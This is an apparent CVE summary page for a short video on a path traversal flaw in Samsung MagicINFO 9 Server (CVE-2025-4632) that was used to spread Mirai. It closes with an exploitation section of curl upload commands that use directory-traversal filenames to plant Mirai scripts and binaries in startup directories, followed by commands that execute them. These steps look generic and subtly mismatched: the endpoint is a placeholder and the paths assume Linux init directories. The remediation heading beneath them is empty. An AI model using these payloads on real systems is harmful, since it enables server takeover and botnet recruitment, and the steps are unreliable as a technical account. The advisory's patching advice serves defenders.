MagicINFO 9 Server: CWE-22 Path Traversal in Samsung MagicINFO 9 Server (CVE-2025-4632) #shorts
Summary
In this episode we cover CVE-2025-4632, a critical path traversal vulnerability in Samsung MagicINFO 9 Server that allows an attacker to write arbitrary files with system-level privileges. Exploited in the wild to deploy a Mirai botnet, the flaw has prompted Samsung to release urgent updates and CISA to add the issue to its Known Exploited Vulnerabilities Catalog.
Product details
The affected product is Samsung Electronics’ MagicINFO 9 Server, versions earlier than 21.1052. MagicINFO is a digital signage management solution widely used by enterprises and public institutions to control display networks across multiple locations. The vulnerability was published on May 13, 2025 and updated on May 22, 2025.
Vulnerability type summary
CVE-2025-4632 is classified as a CWE-22 Improper Limitation of a Pathname to a Restricted Directory, commonly known as a path traversal vulnerability. This type of flaw occurs when user-supplied input is not properly sanitized, allowing traversal outside of intended directories.
Details of the vulnerability
An attacker can craft a specially formed request to MagicINFO 9 Server, exploiting the lack of input validation on file paths. By manipulating the pathname, the attacker gains the ability to write files anywhere on the server with system-level privileges. In observed attacks, adversaries used this access to drop Mirai botnet binaries, turning compromised machines into part of a distributed denial of service network. Samsung has confirmed active exploitation and provided patches in version 21.1052 to address the flaw. CISA has added this CVE to its catalog of known exploited vulnerabilities.
Conclusion
If you manage Samsung MagicINFO 9 Server, immediately verify your version and apply the 21.1052 update or later. Path traversal vulnerabilities can lead to complete server takeover and inclusion in botnet campaigns. Regularly review CISA’s Known Exploited Vulnerabilities Catalog, keep your software up to date, and implement strict input validation to reduce your risk.
Watch the full video on YouTube: CVE-2025-4632
Remediation and exploitation details
This chain involves the following actors
- Malicious actor: Exploits the path-traversal flaw to write files as system authority
- System administrator: Deploys, updates and configures the MagicINFO 9 Server
This following systems are involved
- Samsung MagicINFO 9 Server (Digital-signage content management and distribution): Hosts the web interface and file operations including uploads
- Underlying operating system (Executes the server process and enforces file-system permissions): Runs the final payload with system authority once written
Attack entry point
- File upload endpoint: HTTP endpoint in the MagicINFO 9 Server web interface that accepts a filename parameter without validating path components
Remediation actions
Exploitation actions
Path traversal via filename parameter
- curl -X POST 'http://target/magicinfo/upload' -F "filename=../../../../etc/init.d/mirai.sh" -F "file=@mirai.sh"
HTTP POST with multipart form data
- curl -X POST 'http://target/magicinfo/upload' -F "filename=../../../../usr/local/bin/mirai" -F "file=@mirai_binary"
Arbitrary file write
- ls -l /etc/init.d/mirai.sh
Malware deployment via file-system
- cat /etc/init.d/mirai.sh
Remote code execution through startup scripts
- bash /etc/init.d/mirai.sh
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://security.samsungtv.com/securityUpdates#SVP-MAY-2025
- [2025-05-14] Samsung releases updates to patch CVE-2025-4632 in MagicINFO 9 Server, exploited to deploy Mirai botnet.
- [2025-05-14] Samsung releases updates to fix CVE-2025-4632 exploit in MagicINFO 9 Server.
- [2025-05-23] CISA adds CVE-2025-4632 Samsung MagicINFO 9 Server Path Traversal Vulnerability to its Known Exploited Vulnerabilities Catalog.